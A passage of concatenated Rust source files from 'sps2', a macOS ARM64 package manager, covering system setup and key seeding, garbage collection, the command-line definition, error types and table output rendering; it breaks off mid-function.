    pub fn store(&self) -> &PackageStore {
        self.store.as_ref().expect("store not initialized")
    }
    /// Get state manager
    ///
    /// # Panics
    /// Panics if called before [`Self::initialize`].
    pub fn state(&self) -> &StateManager {
        self.state.as_ref().expect("state not initialized")
    }
    /// Get index manager
    ///
    /// # Panics
    /// Panics if called before [`Self::initialize`].
    pub fn index(&self) -> &IndexManager {
        self.index.as_ref().expect("index not initialized")
    }
    /// Get network client
    ///
    /// # Panics
    /// Panics if called before [`Self::initialize`].
    pub fn net(&self) -> &NetClient {
        self.net.as_ref().expect("net not initialized")
    }
    /// Get resolver
    ///
    /// # Panics
    /// Panics if called before [`Self::initialize`].
    pub fn resolver(&self) -> &Resolver {
        self.resolver.as_ref().expect("resolver not initialized")
    }
    /// Get builder (returns an owned clone, unlike the other accessors)
    ///
    /// # Panics
    /// Panics if called before [`Self::initialize`].
    pub fn builder(&self) -> Builder {
        self.builder
            .as_ref()
            .expect("builder not initialized")
            .clone()
    }
    /// Ensure required system directories exist
    ///
    /// Creates any missing directory, seeds default repositories/keys on
    /// first run, then verifies write permissions on critical paths.
    async fn ensure_system_directories(&self) -> Result<(), CliError> {
        let required_dirs = [
            fixed_paths::PREFIX,
            fixed_paths::STORE_DIR,
            fixed_paths::STATES_DIR,
            fixed_paths::LIVE_DIR,
            fixed_paths::LOGS_DIR,
            fixed_paths::KEYS_DIR,
        ];
        for dir in &required_dirs {
            let path = Path::new(dir);
            if !path.exists() {
                debug!("Creating directory: {}", dir);
                tokio::fs::create_dir_all(path)
                    .await
                    .map_err(|e| CliError::Setup(format!("Failed to create {dir}: {e}")))?;
            }
        }
        // Seed default repositories and keys on first run
        self.seed_default_repositories_and_keys().await?;
        // Check permissions on critical paths
        self.check_permissions().await?;
        Ok(())
    }
    /// Seed default repositories and embedded public keys on first run
    ///
    /// Idempotent: `trusted_keys.json` is only written when it does not
    /// already exist.
    async fn seed_default_repositories_and_keys(&self) -> Result<(), CliError> {
        use sps2_config::fixed_paths;
        use tokio::fs;
        // Initialize repos in config if empty
        // For now, write defaults into config file only if none are present
        // Embedded public key placeholder (replace with real key for production)
        // NOTE(review): this hard-coded bootstrap key must be replaced before
        // any production release — anyone holding the matching secret key can
        // sign packages the client will trust.
        let bootstrap_key = "RWSGOq2NVecA2UPNdBUZykp1MLhfMmkAK/SZSjK3bpq2q7I8LbSVVBDm".to_string();
        // Ensure keys dir exists
        fs::create_dir_all(fixed_paths::KEYS_DIR)
            .await
            .map_err(|e| CliError::Setup(format!("Failed to create keys dir: {e}")))?;
        // Initialize trusted_keys.json if missing using KeyManager (ensures correct key_id)
        let keys_file = std::path::Path::new(fixed_paths::KEYS_DIR).join("trusted_keys.json");
        if !keys_file.exists() {
            let mut key_manager =
                sps2_ops::keys::KeyManager::new(std::path::PathBuf::from(fixed_paths::KEYS_DIR));
            key_manager
                .initialize_with_bootstrap(&bootstrap_key)
                .await
                .map_err(|e| CliError::Setup(format!("Failed to initialize bootstrap key: {e}")))?;
        }
        Ok(())
    }
    /// Check permissions on system directories
    ///
    /// # Errors
    /// Fails when a path cannot be stat'd or reports itself read-only.
    async fn check_permissions(&self) -> Result<(), CliError> {
        let paths_to_check = [
            fixed_paths::PREFIX,
            fixed_paths::STORE_DIR,
            fixed_paths::STATES_DIR,
            fixed_paths::LIVE_DIR,
        ];
        for path in &paths_to_check {
            let metadata = tokio::fs::metadata(path)
                .await
                .map_err(|e| CliError::Setup(format!("Cannot access {path}: {e}")))?;
            // Check if we can write to the directory
            // NOTE(review): `readonly()` inspects permission bits only, not
            // the effective user or ACLs — confirm this check is sufficient.
            if metadata.permissions().readonly() {
                return Err(CliError::Setup(format!("No write permission for {path}")));
            }
        }
        Ok(())
    }
    /// Initialize package store
    ///
    /// Purely constructs the store handle; no I/O is performed here.
    async fn init_store(&mut self) -> Result<(), CliError> {
        debug!("Initializing package store");
        let store_path = Path::new(fixed_paths::STORE_DIR);
        let store = PackageStore::new(store_path.to_path_buf());
        self.store = Some(store);
        Ok(())
    }
    /// Initialize state manager
    ///
    /// # Errors
    /// Wraps any `StateManager::new` failure in `CliError::Setup`.
    async fn init_state(&mut self) -> Result<(), CliError> {
        debug!("Initializing state manager");
        let state_path = Path::new(fixed_paths::PREFIX);
        let state = StateManager::new(state_path)
            .await
            .map_err(|e| CliError::Setup(format!("Failed to initialize state: {e}")))?;
        self.state = Some(state);
        Ok(())
    }
    /// Initialize index manager
    ///
    /// Tries to load the cached index; on failure it falls back to an empty
    /// index so later commands can still run (a reposync will repopulate it).
    async fn init_index(&mut self) -> Result<(), CliError> {
        debug!("Initializing index manager");
        let cache_path = Path::new(fixed_paths::PREFIX);
        let mut index = IndexManager::new(cache_path);
        // Try to load cached index
        match index.load(None).await {
            Ok(()) => {
                debug!("Loaded cached index");
            }
            Err(e) => {
                warn!("Failed to load cached index, will need reposync: {}", e);
                // Create empty index for now
                let empty_index = sps2_index::Index::new();
                let json = empty_index
                    .to_json()
                    .map_err(|e| CliError::Setup(format!("Failed to create empty index: {e}")))?;
                index
                    .load(Some(&json))
                    .await
                    .map_err(|e| CliError::Setup(format!("Failed to load empty index: {e}")))?;
            }
        }
        self.index = Some(index);
        Ok(())
    }
    /// Initialize network client
    ///
    /// Timeout/retry values come from the loaded config; connection-pool
    /// parameters are fixed constants here.
    async fn init_net(&mut self) -> Result<(), CliError> {
        debug!("Initializing network client");
        // Create NetConfig from our configuration
        let net_config = sps2_net::NetConfig {
            timeout: std::time::Duration::from_secs(self.config.network.timeout),
            // Hard-coded pool settings; only timeout/retries are configurable.
            connect_timeout: std::time::Duration::from_secs(30),
            pool_idle_timeout: std::time::Duration::from_secs(90),
            pool_max_idle_per_host: 10,
            retry_count: self.config.network.retries,
            retry_delay: std::time::Duration::from_secs(self.config.network.retry_delay),
            user_agent: format!("sps2/{}", env!("CARGO_PKG_VERSION")),
        };
        let net = sps2_net::NetClient::new(net_config)
            .map_err(|e| CliError::Setup(format!("Failed to create network client: {e}")))?;
        self.net = Some(net);
        Ok(())
    }
    /// Initialize resolver
    ///
    /// Must run after `init_index`: the resolver is built from a clone of
    /// the loaded index (the `unwrap` relies on that ordering).
    async fn init_resolver(&mut self) -> Result<(), CliError> {
        debug!("Initializing resolver");
        let index = self.index.as_ref().unwrap().clone();
        let resolver = Resolver::new(index);
        self.resolver = Some(resolver);
        Ok(())
    }
    /// Initialize builder
    ///
    /// Must run after `init_net`: the builder is given a clone of the
    /// network client (the `unwrap` relies on that ordering).
    async fn init_builder(&mut self) -> Result<(), CliError> {
        debug!("Initializing builder");
        let net = self.net.as_ref().unwrap().clone();
        let builder = Builder::new().with_net(net);
        self.builder = Some(builder);
        Ok(())
    }
    /// Initialize platform cache
    ///
    /// Warms the global `PlatformManager` cache from persistent storage so
    /// tool discovery later avoids repeated lookups.
    async fn init_platform_cache(&mut self) -> Result<(), CliError> {
        debug!("Initializing platform cache");
        // Initialize the platform manager's cache from persistent storage
        let platform_manager = sps2_platform::core::PlatformManager::instance();
        platform_manager
            .initialize_cache()
            .await
            .map_err(|e| CliError::Setup(format!("Failed to initialize platform cache: {e}")))?;
        debug!("Platform cache initialized successfully");
        Ok(())
    }
    /// Perform startup maintenance tasks
    ///
    /// Runs garbage collection when the last GC was more than seven days
    /// ago, then removes orphaned staging directories. Requires `init_state`
    /// and `init_store` to have run (the `unwrap`s rely on that).
    async fn startup_maintenance(&mut self) -> Result<(), CliError> {
        debug!("Performing startup maintenance");
        // Check if garbage collection is needed (>7 days since last GC)
        let state = self.state.as_ref().unwrap();
        if self.should_run_startup_gc(state).await? {
            info!("Running startup garbage collection");
            // Clean up old states using configured retention count
            let cleaned_states = state
                .cleanup_old_states(self.config.state.retention_count)
                .await
                .map_err(|e| CliError::Setup(format!("Startup GC failed: {e}")))?;
            // Clean up orphaned packages
            let store = self.store.as_ref().unwrap();
            let cleaned_packages = store
                .garbage_collect()
                .map_err(|e| CliError::Setup(format!("Startup GC failed: {e}")))?;
            if !cleaned_states.is_empty() || cleaned_packages > 0 {
                info!(
                    "Startup GC: cleaned {} states and {} packages",
                    cleaned_states.len(),
                    cleaned_packages
                );
            }
            // Update GC timestamp after successful cleanup
            self.write_last_gc_timestamp().await?;
        }
        // Clean orphaned staging directories
        self.clean_orphaned_staging().await?;
        Ok(())
    }
    /// Check if startup GC should run
    ///
    /// Reads the persisted GC timestamp; a missing/unreadable file counts
    /// as "GC needed". The `_state` parameter is currently unused.
    async fn should_run_startup_gc(&self, _state: &StateManager) -> Result<bool, CliError> {
        // Check if last GC was >7 days ago by reading timestamp file
        match self.read_last_gc_timestamp().await {
            Ok(last_gc) => {
                let now = std::time::SystemTime::now()
                    .duration_since(std::time::UNIX_EPOCH)
                    .unwrap_or_default()
                    .as_secs();
                // saturating_sub guards against clocks before the epoch window.
                let seven_days_ago = now.saturating_sub(7 * 24 * 60 * 60);
                Ok(last_gc < seven_days_ago)
            }
            Err(_) => {
                // If we can't read the timestamp file, assume GC is needed
                debug!("No GC timestamp found, running startup GC");
                Ok(true)
            }
        }
    }
    /// Clean up orphaned staging directories (only safe to remove)
    ///
    /// Scans the states directory for `staging-<uuid>` entries and removes
    /// each one only after the state manager confirms it is no longer in
    /// use. All removal failures are logged and skipped, never fatal.
    async fn clean_orphaned_staging(&self) -> Result<(), CliError> {
        let states_dir = Path::new(fixed_paths::STATES_DIR);
        if !states_dir.exists() {
            return Ok(());
        }
        let mut entries = tokio::fs::read_dir(states_dir)
            .await
            .map_err(|e| CliError::Setup(format!("Failed to read states directory: {e}")))?;
        let mut cleaned = 0;
        let state_manager = self.state.as_ref().unwrap();
        while let Some(entry) = entries
            .next_entry()
            .await
            .map_err(|e| CliError::Setup(format!("Failed to read directory entry: {e}")))?
        {
            let file_name = entry.file_name();
            if let Some(name) = file_name.to_str() {
                if name.starts_with("staging-") {
                    // Extract staging ID from directory name; entries whose
                    // suffix is not a valid UUID are silently left alone.
                    if let Some(id_str) = name.strip_prefix("staging-") {
                        if let Ok(staging_id) = uuid::Uuid::parse_str(id_str) {
                            // Only remove if it's safe to do so
                            match state_manager.can_remove_staging(&staging_id).await {
                                Ok(true) => {
                                    debug!("Removing orphaned staging directory: {}", name);
                                    if let Err(e) = tokio::fs::remove_dir_all(entry.path()).await {
                                        warn!(
                                            "Failed to remove orphaned staging directory {}: {}",
                                            name, e
                                        );
                                    } else {
                                        cleaned += 1;
                                    }
                                }
                                Ok(false) => {
                                    debug!("Staging directory {} is still in use, skipping", name);
                                }
                                Err(e) => {
                                    warn!("Failed to check if staging directory {} can be removed: {}", name, e);
                                }
                            }
                        }
                    }
                }
            }
        }
        if cleaned > 0 {
            info!("Cleaned {} orphaned staging directories", cleaned);
        }
        Ok(())
    }
    /// Read the last GC timestamp from file
    ///
    /// Returns the stored value as seconds since the Unix epoch; errors on
    /// a missing file or non-numeric content.
    async fn read_last_gc_timestamp(&self) -> Result<u64, CliError> {
        let timestamp_path = self.gc_timestamp_path();
        let content = tokio::fs::read_to_string(&timestamp_path)
            .await
            .map_err(|e| CliError::Setup(format!("Failed to read GC timestamp: {e}")))?;
        content
            .trim()
            .parse::<u64>()
            .map_err(|e| CliError::Setup(format!("Invalid GC timestamp format: {e}")))
    }
    /// Write the current timestamp as the last GC time
    ///
    /// Stores seconds since the Unix epoch as plain text, mirroring the
    /// format `read_last_gc_timestamp` parses.
    async fn write_last_gc_timestamp(&self) -> Result<(), CliError> {
        let timestamp_path = self.gc_timestamp_path();
        let now = std::time::SystemTime::now()
            .duration_since(std::time::UNIX_EPOCH)
            .unwrap_or_default()
            .as_secs();
        tokio::fs::write(&timestamp_path, now.to_string())
            .await
            .map_err(|e| CliError::Setup(format!("Failed to write GC timestamp: {e}")))?;
        debug!("Updated GC timestamp: {}", now);
        Ok(())
    }
/// Get the path to the GC timestamp file
fn gc_timestamp_path(&self) -> PathBuf {
Path::new(fixed_paths::LAST_GC_TIMESTAMP).to_path_buf()
}
    /// Update GC timestamp - public static method for ops crate
    ///
    /// NOTE(review): duplicates `write_last_gc_timestamp` (minus logging)
    /// because callers in the ops crate have no `SystemSetup` instance;
    /// keep the two in sync if the timestamp format changes.
    pub async fn update_gc_timestamp_static() -> Result<(), CliError> {
        let timestamp_path = std::path::Path::new(fixed_paths::LAST_GC_TIMESTAMP);
        let now = std::time::SystemTime::now()
            .duration_since(std::time::UNIX_EPOCH)
            .unwrap_or_default()
            .as_secs();
        tokio::fs::write(timestamp_path, now.to_string())
            .await
            .map_err(|e| CliError::Setup(format!("Failed to write GC timestamp: {e}")))?;
        Ok(())
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/cli.rs | apps/sps2/src/cli.rs | //! Command line interface definition
use clap::{Parser, Subcommand};
use sps2_types::ColorChoice;
use std::path::PathBuf;
use uuid::Uuid;
/// sps2 - Modern package manager for macOS ARM64
// NOTE: only `//` comments are added inside clap-derive items; `///` doc
// comments on fields would alter the generated --help text.
#[derive(Parser)]
#[command(name = "sps2")]
#[command(version = env!("CARGO_PKG_VERSION"))]
#[command(about = "Modern package manager for macOS ARM64")]
#[command(long_about = None)]
pub struct Cli {
    // The selected subcommand.
    #[command(subcommand)]
    pub command: Commands,
    // Flags shared by every subcommand (see GlobalArgs).
    #[command(flatten)]
    pub global: GlobalArgs,
}
/// Global arguments available for all commands
// Existing `///` field comments are clap help text and kept verbatim;
// added notes use `//` so --help output is unchanged.
#[derive(clap::Args)]
pub struct GlobalArgs {
    /// Output in JSON format
    #[arg(long, global = true)]
    pub json: bool,
    /// Enable debug logging to /opt/pm/logs/
    #[arg(long, global = true)]
    pub debug: bool,
    /// Color output control
    #[arg(long, global = true, value_enum)]
    pub color: Option<ColorChoice>,
    /// Use alternate config file
    #[arg(long, global = true, value_name = "PATH")]
    pub config: Option<PathBuf>,
    /// Use alternate builder config file
    #[arg(long, global = true, value_name = "PATH")]
    pub builder_config: Option<PathBuf>,
    /// Show what would be done without executing (like ansible --check)
    #[arg(long, global = true)]
    pub check: bool,
}
/// Available commands
///
/// Variant order is preserved because it determines help-text ordering.
/// The only code change versus the previous revision is normalizing the
/// lone legacy `#[clap(long)]` attribute (on `Reposync.yes`) to the
/// `#[arg(long)]` spelling used by every other flag in this file; clap 4
/// treats the two identically.
#[derive(Subcommand)]
pub enum Commands {
    /// Install packages from repository or local files
    #[command(alias = "i")]
    Install {
        /// Package specifications (name, name>=version, or ./file.sp)
        packages: Vec<String>,
        /// Force re-download even if package exists in cache
        #[arg(long)]
        force_download: bool,
    },
    /// Update packages to newer compatible versions
    #[command(alias = "up")]
    Update {
        /// Specific packages to update (empty = all packages)
        packages: Vec<String>,
    },
    /// Upgrade packages to latest versions (ignore upper bounds)
    #[command(alias = "ug")]
    Upgrade {
        /// Specific packages to upgrade (empty = all packages)
        packages: Vec<String>,
    },
    /// Uninstall packages
    #[command(alias = "rm")]
    Uninstall {
        /// Package names to uninstall
        packages: Vec<String>,
    },
    /// Build package from YAML recipe
    Build {
        /// Path to recipe file (.yaml or .yml)
        recipe: PathBuf,
        /// Output directory for .sp file
        #[arg(short, long)]
        output_dir: Option<PathBuf>,
        /// Allow network access during build
        #[arg(long)]
        network: bool,
        /// Number of parallel build jobs (0=auto)
        #[arg(short, long)]
        jobs: Option<usize>,
        // Compression-related flags are removed until fully supported
    },
    /// Package from staging directory without rebuilding
    #[command(alias = "p")]
    #[command(group(
        clap::ArgGroup::new("pack_source")
            .required(true)
            .args(&["recipe", "directory"]),
    ))]
    Pack {
        /// Path to recipe file (.yaml or .yml)
        #[arg(short = 'r', long = "recipe")]
        recipe: Option<PathBuf>,
        /// Path to a directory to package directly (skips post-processing)
        #[arg(short = 'd', long = "directory")]
        directory: Option<PathBuf>,
        /// Path to a manifest.toml file (requires --directory)
        #[arg(short = 'm', long, requires = "directory")]
        // require directory when manifest is used
        manifest: Option<PathBuf>,
        // SBOM flag removed (soft disable): previously --sbom/-s (optional when using --directory)
        /// Skip post-processing steps and QA pipeline (only with --recipe)
        #[arg(short = 'n', long = "no-post", requires = "recipe")]
        no_post: bool,
        /// Output directory for .sp file
        #[arg(short, long)]
        output_dir: Option<PathBuf>,
    },
    /// List installed packages
    #[command(alias = "ls")]
    List,
    /// Show information about a package
    Info {
        /// Package name
        package: String,
    },
    /// Search for packages
    #[command(alias = "find")]
    Search {
        /// Search query
        query: String,
    },
    /// Sync repository index
    #[command(alias = "sync")]
    Reposync {
        /// Automatically trust new keys
        #[arg(long)]
        yes: bool,
    },
    /// Clean up orphaned packages and old states
    Cleanup,
    /// Rollback to previous state
    Rollback {
        /// Target state ID (empty = previous state)
        state_id: Option<Uuid>,
    },
    /// Show state history
    History {
        /// Show all states (no availability filtering)
        #[arg(long)]
        all: bool,
        /// Verify availability by checking CAS contents on disk
        #[arg(long)]
        verify: bool,
        /// Limit number of states for --verify (overrides config)
        #[arg(long, requires = "verify")]
        limit: Option<usize>,
    },
    /// Check system health
    #[command(name = "check-health")]
    CheckHealth,
    // Audit command soft-disabled (entire variant commented out)
    /*
    /// Audit temporarily disabled
    #[command(hide = true, about = "Audit temporarily disabled")]
    Audit {
        /// Scan all packages (default: all)
        #[arg(long)]
        all: bool,
        /// Scan specific package
        #[arg(long, value_name = "NAME")]
        package: Option<String>,
        /// Fail on critical vulnerabilities
        #[arg(long)]
        fail_on_critical: bool,
        /// Minimum severity to report (low, medium, high, critical)
        #[arg(long, value_name = "SEVERITY")]
        severity: Option<String>,
    },
    */
    /// Update sps2 to the latest version
    #[command(name = "self-update")]
    SelfUpdate {
        /// Skip signature verification (not recommended)
        #[arg(long)]
        skip_verify: bool,
        /// Force update even if already on latest version
        #[arg(long)]
        force: bool,
    },
    /// Verify and optionally heal the current state
    Verify {
        /// Automatically heal any discrepancies found
        #[arg(long)]
        heal: bool,
        /// Verification level (quick, standard, full)
        #[arg(long, default_value = "standard")]
        level: String,
        /// Verification scope (live, store, all)
        #[arg(long, default_value = "live")]
        scope: String,
        /// Synchronize DB refcounts from the active state after verification/heal
        /// (one-off maintenance; does not change persistent config)
        #[arg(long)]
        sync_refcounts: bool,
    },
    /// Manage repositories
    #[command(subcommand)]
    Repo(RepoCommands),
    /// Manage trusted signing keys
    #[command(subcommand)]
    Keys(KeysCommands),
}
/// Repository management subcommands
#[derive(Subcommand)]
pub enum RepoCommands {
/// Add a new repository
Add {
/// A unique name for the repository
#[clap(required = true)]
name: String,
/// The URL of the repository
#[clap(required = true)]
url: String,
},
/// List configured repositories
List,
/// Remove a repository by name
Remove {
/// Repository name (e.g., fast, slow, stable, or extras key)
name: String,
},
}
/// Key management subcommands
///
/// Keys are Minisign public keys used to verify package signatures.
#[derive(Subcommand)]
pub enum KeysCommands {
    /// List trusted signing keys
    List,
    /// Import a Minisign public key (.pub or base64)
    Import {
        /// Path to Minisign public key (.pub or text file containing base64)
        file: PathBuf,
        /// Optional comment to store with the key
        #[arg(long)]
        comment: Option<String>,
    },
    /// Remove a trusted key by key ID
    Remove {
        /// Minisign key ID (hex)
        key_id: String,
    },
}
// NOTE(review): empty impl block with no associated items — looks like a
// leftover placeholder; confirm it is unused before deleting.
impl Commands {}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/error.rs | apps/sps2/src/error.rs | //! CLI error handling
use std::fmt;
use sps2_errors::UserFacingError;
/// CLI-specific error type
///
/// Aggregates every failure class the binary surfaces to the user;
/// the `Display` impl renders each one in user-facing form.
#[derive(Debug)]
pub enum CliError {
    /// Configuration error
    Config(sps2_errors::ConfigError),
    /// Operations error
    // Rendered via the `UserFacingError` trait (message/code/hint/retry).
    Ops(sps2_errors::Error),
    /// System setup error
    Setup(String),
    /// Invalid command arguments
    InvalidArguments(String),
    /// I/O error
    Io(std::io::Error),
}
impl fmt::Display for CliError {
    /// Human-readable rendering of each error class.
    ///
    /// Operation errors additionally surface a machine code, a hint, and
    /// a retry note whenever the underlying error provides them.
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        match self {
            CliError::Config(e) => write!(f, "Configuration error: {e}"),
            CliError::Setup(msg) => write!(f, "System setup error: {msg}"),
            CliError::InvalidArguments(msg) => write!(f, "Invalid arguments: {msg}"),
            CliError::Io(e) => write!(f, "I/O error: {e}"),
            CliError::Ops(e) => {
                write!(f, "{}", e.user_message())?;
                if let Some(code) = e.user_code() {
                    write!(f, "\n Code: {code}")?;
                }
                if let Some(hint) = e.user_hint() {
                    write!(f, "\n Hint: {hint}")?;
                }
                if e.is_retryable() {
                    write!(f, "\n Retry: safe to retry this operation.")?;
                }
                Ok(())
            }
        }
    }
}
impl std::error::Error for CliError {
    /// Expose the wrapped error for variants that carry one, so callers
    /// can walk the chain via `Error::source`.
    fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
        match self {
            CliError::Config(e) => Some(e),
            CliError::Ops(e) => Some(e),
            CliError::Io(e) => Some(e),
            // Spelled out instead of `_` so that adding a new wrapping
            // variant produces a compile error here rather than silently
            // dropping its source.
            CliError::Setup(_) | CliError::InvalidArguments(_) => None,
        }
    }
}
impl From<sps2_errors::ConfigError> for CliError {
    /// Wrap a configuration error so `?` converts it automatically.
    fn from(e: sps2_errors::ConfigError) -> Self {
        Self::Config(e)
    }
}
impl From<sps2_errors::Error> for CliError {
    /// Wrap an operations error so `?` converts it automatically.
    fn from(e: sps2_errors::Error) -> Self {
        Self::Ops(e)
    }
}
impl From<std::io::Error> for CliError {
fn from(e: std::io::Error) -> Self {
CliError::Io(e)
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/display.rs | apps/sps2/src/display.rs | //! Output rendering and formatting
use comfy_table::{presets::UTF8_FULL, Attribute, Cell, Color, ContentArrangement, Table};
use console::{Style, Term};
use sps2_ops::{
BuildReport, HealthCheck, HealthStatus, InstallReport, IssueSeverity, OperationResult,
PackageInfo, PackageStatus, SearchResult, StateInfo,
};
use sps2_types::ColorChoice;
use std::io;
/// Output renderer for CLI results
///
/// Chooses between JSON and human-readable table rendering based on
/// the flags captured at construction time.
#[derive(Clone)]
pub struct OutputRenderer {
    /// Use JSON output format
    json_output: bool,
    /// Color configuration
    color_choice: ColorChoice,
    /// Terminal instance
    // Used to probe terminal color support when `color_choice` is `Auto`.
    term: Term,
}
impl OutputRenderer {
/// Create new output renderer
pub fn new(json_output: bool, color_choice: ColorChoice) -> Self {
Self {
json_output,
color_choice,
term: Term::stdout(),
}
}
/// Render operation result
pub fn render_result(&self, result: &OperationResult) -> io::Result<()> {
if self.json_output {
self.render_json(result)
} else {
self.render_table(result)
}
}
/// Render as JSON
fn render_json(&self, result: &OperationResult) -> io::Result<()> {
let json = result.to_json().map_err(io::Error::other)?;
println!("{json}");
Ok(())
}
    /// Render as formatted table
    ///
    /// Human-readable dispatch: each result variant has a dedicated
    /// renderer implemented below.
    fn render_table(&self, result: &OperationResult) -> io::Result<()> {
        match result {
            OperationResult::PackageList(packages) => self.render_package_list(packages),
            OperationResult::PackageInfo(info) => self.render_package_info(info),
            OperationResult::SearchResults(results) => self.render_search_results(results),
            OperationResult::InstallReport(report) => self.render_install_report(report),
            OperationResult::BuildReport(report) => self.render_build_report(report),
            OperationResult::StateInfo(info) => self.render_state_info(info),
            OperationResult::StateHistory(history) => self.render_state_history(history),
            OperationResult::HealthCheck(health) => self.render_health_check(health),
            OperationResult::Success(message) => self.render_success_message(message),
            OperationResult::Report(report) => self.render_op_report(report),
            OperationResult::VerificationResult(result) => self.render_verification_result(result),
        }
    }
fn render_verification_result(&self, result: &sps2_ops::VerificationResult) -> io::Result<()> {
if self.json_output {
println!(
"{}",
serde_json::to_string_pretty(result).map_err(io::Error::other)?
);
return Ok(());
}
if result.is_valid {
println!("[OK] State verification passed.");
} else {
println!(
"[ERROR] State verification failed with {} discrepancies:",
result.discrepancies.len()
);
for discrepancy in &result.discrepancies {
println!(" - {discrepancy:?}");
}
}
Ok(())
}
/// Render package list
fn render_package_list(&self, packages: &[PackageInfo]) -> io::Result<()> {
if packages.is_empty() {
println!("No packages installed.");
return Ok(());
}
let mut table = Table::new();
table
.load_preset(UTF8_FULL)
.set_content_arrangement(ContentArrangement::Dynamic);
// Add headers
table.set_header(vec![
Cell::new("Package").add_attribute(Attribute::Bold),
Cell::new("Version").add_attribute(Attribute::Bold),
Cell::new("Status").add_attribute(Attribute::Bold),
Cell::new("Description").add_attribute(Attribute::Bold),
]);
// Add package rows
for package in packages {
let status_cell = self.format_package_status(&package.status);
let version_str = package
.version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "-".to_string());
table.add_row(vec![
Cell::new(&package.name),
Cell::new(version_str),
status_cell,
Cell::new(package.description.as_deref().unwrap_or("-")),
]);
}
println!("{table}");
Ok(())
}
/// Render package information
fn render_package_info(&self, info: &PackageInfo) -> io::Result<()> {
println!("{}", self.style_package_name(&info.name));
println!();
// Basic information
if let Some(description) = &info.description {
println!("Description: {description}");
}
if let Some(version) = &info.version {
println!("Installed: {version}");
}
if let Some(available) = &info.available_version {
println!("Available: {available}");
}
println!(
"Status: {}",
self.format_package_status_text(&info.status)
);
if let Some(license) = &info.license {
println!("License: {license}");
}
if let Some(homepage) = &info.homepage {
println!("Homepage: {homepage}");
}
// Dependencies
if !info.dependencies.is_empty() {
println!();
println!("Dependencies:");
for dep in &info.dependencies {
println!(" • {dep}");
}
}
// Size information
if let Some(size) = info.size {
println!();
println!("Size: {}", format_size(size));
}
Ok(())
}
/// Render search results
fn render_search_results(&self, results: &[SearchResult]) -> io::Result<()> {
if results.is_empty() {
println!("No packages found.");
return Ok(());
}
let mut table = Table::new();
table
.load_preset(UTF8_FULL)
.set_content_arrangement(ContentArrangement::Dynamic);
table.set_header(vec![
Cell::new("Package").add_attribute(Attribute::Bold),
Cell::new("Version").add_attribute(Attribute::Bold),
Cell::new("Installed").add_attribute(Attribute::Bold),
Cell::new("Description").add_attribute(Attribute::Bold),
]);
for result in results {
let installed_text = if result.installed { "Yes" } else { "No" };
let installed_cell = if result.installed {
Cell::new(installed_text).fg(Color::Green)
} else {
Cell::new(installed_text)
};
table.add_row(vec![
Cell::new(&result.name),
Cell::new(result.version.to_string()),
installed_cell,
Cell::new(result.description.as_deref().unwrap_or("-")),
]);
}
println!("{table}");
Ok(())
}
/// Render installation report
fn render_install_report(&self, report: &InstallReport) -> io::Result<()> {
let total_changes = report.installed.len() + report.updated.len() + report.removed.len();
if total_changes == 0 {
println!("No changes made.");
return Ok(());
}
// Summary
println!("Installation Summary");
println!();
if !report.installed.is_empty() {
println!("Installed ({}):", report.installed.len());
for change in &report.installed {
let version = change
.to_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" • {} {}", change.name, version);
}
println!();
}
if !report.updated.is_empty() {
println!("Updated ({}):", report.updated.len());
for change in &report.updated {
let from = change
.from_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let to = change
.to_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" • {} {} → {}", change.name, from, to);
}
println!();
}
if !report.removed.is_empty() {
println!("Removed ({}):", report.removed.len());
for change in &report.removed {
let version = change
.from_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" • {} {}", change.name, version);
}
println!();
}
println!("Completed in {}ms", report.duration_ms);
println!("State: {}", report.state_id);
Ok(())
}
    /// Render build report
    ///
    /// Prints package identity, the produced artifact path, and the
    /// wall-clock build duration.
    fn render_build_report(&self, report: &BuildReport) -> io::Result<()> {
        println!("Build Summary");
        println!();
        println!("Package: {} {}", report.package, report.version);
        println!("Output: {}", report.output_path.display());
        println!("Duration: {}ms", report.duration_ms);
        // SBOM output removed (soft disable): previously displayed report.sbom_generated
        Ok(())
    }
/// Render state information
fn render_state_info(&self, info: &StateInfo) -> io::Result<()> {
println!("State Information");
println!();
println!("ID: {}", info.id);
println!("Current: {}", if info.current { "Yes" } else { "No" });
println!(
"Created: {}",
info.timestamp.format("%Y-%m-%d %H:%M:%S UTC")
);
println!("Operation: {}", info.operation);
println!("Packages: {}", info.package_count);
if let Some(parent) = info.parent {
println!("Parent: {parent}");
}
if !info.changes.is_empty() {
println!();
println!("Changes:");
for change in &info.changes {
match change.change_type {
sps2_ops::ChangeType::Install => {
let version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" + {} {}", change.package, version);
}
sps2_ops::ChangeType::Update => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let new_version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" ~ {} {} → {}", change.package, old_version, new_version);
}
sps2_ops::ChangeType::Remove => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" - {} {}", change.package, old_version);
}
sps2_ops::ChangeType::Downgrade => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let new_version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
